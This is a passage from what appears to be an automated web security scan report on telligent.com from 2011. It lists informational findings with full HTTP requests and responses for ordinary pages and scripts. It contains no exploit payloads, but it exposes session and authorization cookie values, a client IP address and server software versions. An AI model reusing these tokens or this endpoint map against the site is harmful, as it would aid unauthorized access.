Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /error.htm?aspxerrorpath=/Utility/HeaderFragments/Core/GroupNavigationAjax.asmx
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a12+GMT; expires=Sun, 26-Feb-2012 23:21:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:12 GMT
Connection: close
Content-Length: 210

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferror.htm%3faspxerrorpath%3d%2fUtility%2fHeaderFragments%2fCore%2fGroupNavigationAjax.asmx">here</a>.</h2>
</body
...[SNIP]...

7.422. http://telligent.com/Utility/HeaderFragments/Core/Search.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Utility/HeaderFragments/Core/Search.js

Request

GET /Utility/HeaderFragments/Core/Search.js?Version=5.5.134.11785&LastChanged=633989878560000000 HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 13 Jan 2010 13:57:36 GMT
Accept-Ranges: bytes
ETag: "084c5c5894ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a48+GMT; expires=Sun, 26-Feb-2012 22:04:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:48 GMT
Content-Length: 8771

...var Core_Search_CurrentSearch = null;

function Core_Search_Register(context) {
var textBox = $('#' + context.parameter.textBoxId, context.wrapperElement);
textBox.attr("autocomplete",
...[SNIP]...

7.423. http://telligent.com/Utility/HeaderFragments/Core/SearchAjax.asmx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Utility/HeaderFragments/Core/SearchAjax.asmx

Request

GET /Utility/HeaderFragments/Core/SearchAjax.asmx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /error.htm?aspxerrorpath=/Utility/HeaderFragments/Core/SearchAjax.asmx
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a11+GMT; expires=Sun, 26-Feb-2012 23:21:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:11 GMT
Connection: close
Content-Length: 201

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferror.htm%3faspxerrorpath%3d%2fUtility%2fHeaderFragments%2fCore%2fSearchAjax.asmx">here</a>.</h2>
</body></html>
...[SNIP]...

7.424. http://telligent.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /WebResource.axd

Request

GET /WebResource.axd HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /error-notfound.aspx?aspxerrorpath=/WebResource.axd
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a11+GMT; expires=Sun, 26-Feb-2012 23:21:11 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:11 GMT
Connection: close
Content-Length: 176

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferror-notfound.aspx%3faspxerrorpath%3d%2fWebResource.axd">here</a>.</h2>
</body></html>

7.425. http://telligent.com/analytics.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /analytics.ashx

Request

GET /analytics.ashx?a=5&g=77&ip=173.193.214.243&requrl=%2fproducts%2ftelligent_community.aspx&session=560a102e-bd90-4a32-912f-ea337f9ef1cb&ts=634343330765421166&ua=Mozilla%2f5.0+(Windows%3b+U%3b+Windows+NT+6.1%3b+en-US)+AppleWebKit%2f534.13+(KHTML%2c+like+Gecko)+Chrome%2f9.0.597.98+Safari%2f534.13&uid=13b36763-58d5-4e2d-a664-810fee6b36c6& HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a48+GMT

Response

HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a50+GMT; expires=Sun, 26-Feb-2012 22:04:50 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:50 GMT
Content-Length: 0


7.426. http://telligent.com/cfs-file.ashx/__key/CommunityServer.Components.SiteFiles/TelligentLogo.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /cfs-file.ashx/__key/CommunityServer.Components.SiteFiles/TelligentLogo.png

Request

GET /cfs-file.ashx/__key/CommunityServer.Components.SiteFiles/TelligentLogo.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: public
Expires: Sun, 27 Feb 2011 22:04:49 GMT
Last-Modified: Sat, 26 Feb 2011 22:04:49 GMT
ETag: 634343546893342806
Location: http://telligent.com/cfs-filesystemfile.ashx/__key/CommunityServer-Components-SiteFiles/TelligentLogo.png
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a49+GMT; expires=Sun, 26-Feb-2012 22:04:49 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:49 GMT
Content-Length: 0


7.427. http://telligent.com/community/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /community/

Request

GET /community/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a28+GMT; expires=Sun, 26-Feb-2012 23:21:28 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:28 GMT
Connection: close
Content-Length: 57247


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.428. http://telligent.com/company/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/

Request

GET /company/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a16+GMT; expires=Sun, 26-Feb-2012 23:21:16 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:16 GMT
Connection: close
Content-Length: 67492


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.429. http://telligent.com/company/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/careers/

Request

GET /company/careers/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a23+GMT; expires=Sun, 26-Feb-2012 23:21:23 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:23 GMT
Connection: close
Content-Length: 54979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.430. http://telligent.com/company/community_commitment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/community_commitment/

Request

GET /company/community_commitment/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a24+GMT; expires=Sun, 26-Feb-2012 23:21:24 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:23 GMT
Connection: close
Content-Length: 50945


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.431. http://telligent.com/company/contact_us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/contact_us.aspx

Request

GET /company/contact_us.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a16+GMT; expires=Sun, 26-Feb-2012 23:21:16 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:16 GMT
Connection: close
Content-Length: 55413


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.432. http://telligent.com/company/contact_us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/contact_us/

Request

GET /company/contact_us/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a24+GMT; expires=Sun, 26-Feb-2012 23:21:24 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:24 GMT
Connection: close
Content-Length: 55407


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.433. http://telligent.com/company/leadership/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/leadership/

Request

GET /company/leadership/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a16+GMT; expires=Sun, 26-Feb-2012 23:21:16 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:16 GMT
Connection: close
Content-Length: 61399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.434. http://telligent.com/company/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/news/

Request

GET /company/news/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a17+GMT; expires=Sun, 26-Feb-2012 23:21:17 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:17 GMT
Connection: close
Content-Length: 106292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.435. http://telligent.com/company/news/b/articles/archive/2011/01/17/cmswire-mobile-experience-a-key-requirement-for-communities.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/news/b/articles/archive/2011/01/17/cmswire-mobile-experience-a-key-requirement-for-communities.aspx

Request

GET /company/news/b/articles/archive/2011/01/17/cmswire-mobile-experience-a-key-requirement-for-communities.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a20+GMT; expires=Sun, 26-Feb-2012 23:21:20 GMT; path=/
X-Pingback: http://telligent.com/company/news/b/articles/pingback.aspx
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:19 GMT
Connection: close
Content-Length: 55452


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.436. http://telligent.com/company/news/b/articles/archive/2011/02/17/telligent-integrates-with-sharepoint-2010.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/news/b/articles/archive/2011/02/17/telligent-integrates-with-sharepoint-2010.aspx

Request

GET /company/news/b/articles/archive/2011/02/17/telligent-integrates-with-sharepoint-2010.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
